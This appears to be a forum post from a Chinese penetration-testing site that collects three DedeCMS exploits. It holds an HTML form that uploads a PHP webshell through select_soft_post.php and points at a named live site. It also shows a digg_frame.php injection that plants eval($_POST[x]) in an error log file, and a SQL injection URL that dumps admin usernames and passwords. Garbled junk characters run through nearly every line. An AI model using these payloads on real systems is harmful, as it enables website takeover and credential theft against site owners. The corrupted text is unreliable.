: E6 o* X4 S# R6 N$ n# W- }6 L! \

: v3 I: M7 {$ ^" W. h
/ E: P0 ~* a5 y9 o% v! s* Z
* @4 F: \9 g% Z
0 [3 }: b' g4 R; w9 \4 `# b3 `' P, y+ ^# S' l8 z: p" C# w) G

6 p5 b" _. }" Z0 E' u) |8 }4 f  A' M) b' h4 \

& v  R1 v! Y- j1 X3 K织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
- T: D! b5 `$ M/ \2 a/ f<html>: i7 `( i4 a  I2 N3 Z/ D# p
<head>2 L# l" X# k& w& u, h" ?
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
: b' G% q5 a/ t3 y8 P3 W</head>$ c3 N: D8 L3 [* S) Q& Y
<body style="FONT-SIZE: 9pt">, S0 i6 f' l6 n. o
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
- [+ x2 ^' L# ^+ A4 L  p1 n<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
) O/ S8 I, W% D9 m<input type='hidden' name='activepath' value='/data/cache/' />
9 i5 n7 L; t" H  n4 E1 _. S9 x% ]<input type='hidden' name='cfg_basedir' value='../../' />
/ S4 \$ Z) a" ~4 o( e( A: n<input type='hidden' name='cfg_imgtype' value='php' />
9 @+ x  m# {; M  N" T9 ^<input type='hidden' name='cfg_not_allowall' value='txt' />
: L$ j4 c. Q# T) z$ Y! t& n5 o* w<input type='hidden' name='cfg_softtype' value='php' />
6 l/ L3 n/ H3 C/ r<input type='hidden' name='cfg_mediatype' value='php' />" P2 U( b5 B! J+ Y9 F" a
<input type='hidden' name='f' value='form1.enclosure' />
$ Y% J7 @  x' ]7 p* r<input type='hidden' name='job' value='upload' />
, v! B2 f4 {; j9 b' p<input type='hidden' name='newname' value='fly.php' />
2 f5 w, j& O9 D2 }1 D! N# u9 X4 n0 |, XSelect U Shell <input type='file' name='uploadfile' size='25' />6 E1 k# q9 n0 ]
<input type='submit' name='sb1' value='确定' />* m) U( I  |8 h$ o
</form>
, ]* _1 E) {1 }' H5 t% h<br />It's just a exp for the bug of Dedecms V55...<br />
2 e+ {( X$ R$ k3 TNeed register_globals = on...<br />
( `' K% d6 U: v9 c  w% `Fun the game,get a webshell at /data/cache/fly.php...<br />' @9 b9 f' ^2 G2 i
</body>( I( J! b+ `7 y1 h
</html>' C& w8 A, Y+ [) ^
+ @& H) t0 q9 h" v7 `: s1 a' j$ a

6 k6 w" {1 ]. K: S6 }4 R& W
. {- C# l4 ~. ]$ `" d, U: _+ O1 Z% ?) Q0 r% G2 J
6 z+ T; A- z6 d8 \0 C: f, y' A
; Y" D* x+ o5 Q& N6 i3 C
* e7 u$ w. X: Q, L
* T3 `7 K1 C2 ~8 N0 h% O; |
3 i# V% o- U' V
* I' T3 u; l7 T( p
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞  E$ v) B0 l$ V! n# p2 c1 j. G
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。  J! v$ ?: a' B) S% m7 b
1. 访问网址:
7 E) Q: X% G# I/ `+ y7 h2 mhttp://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
/ s5 K- Y4 v$ `- q. `可看见错误信息* y4 a4 L/ O' \7 o
, Q8 P( i  j' a/ t, ^$ O
/ H; n4 L$ X  e
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。) `& _) s. k  d" U: M- S
int(3) Error: Illegal double '1024e1024' value found during parsing% o0 Q7 ]7 X5 _' g3 R9 B* q7 g9 x
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>3 C. E, F# p& u  [7 r

. A; ]4 p! q' o. G5 X, b% t5 O, o8 ^% P3 b8 a( u) l% H1 I/ H! Q9 W2 P. x
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是' {# T9 ~; y8 A2 k3 j( }# |$ ?

- T; Y  w& u  w8 C+ p9 j6 P- g( u9 F: e, f  o5 x8 p& c* V% Y! H
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>0 i( N5 i* b( r6 U$ w

1 m* K9 Z7 _% |4 n0 O: {2 ~9 Q4 G5 k( l, L6 j6 f
按确定后的看到第2步骤的信息表示文件木马上传成功.2 X3 w" |# x# W) P

/ j9 C& m5 X$ C2 s$ E
! M# p, d( Z' f( K: s
) x8 s/ G' g! x6 c0 u3 N. q6 {0 N2 H
+ u& q  W/ c8 J4 c& y

+ m( h4 S1 J1 d& }
5 _. e: w, M1 J5 f! L+ ~: R7 v: q+ L3 P. R* L) D+ x  G
: h/ J- M1 \* \8 H" u
# W. R' W# C1 ^6 C" D

+ b% s3 G0 u/ K( J* ~
& C% G1 X6 k$ r5 e' Q2 ^5 o织梦(DedeCms)plus/infosearch.php 文件注入漏洞
9 b6 V' x% X& }) B5 ]http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2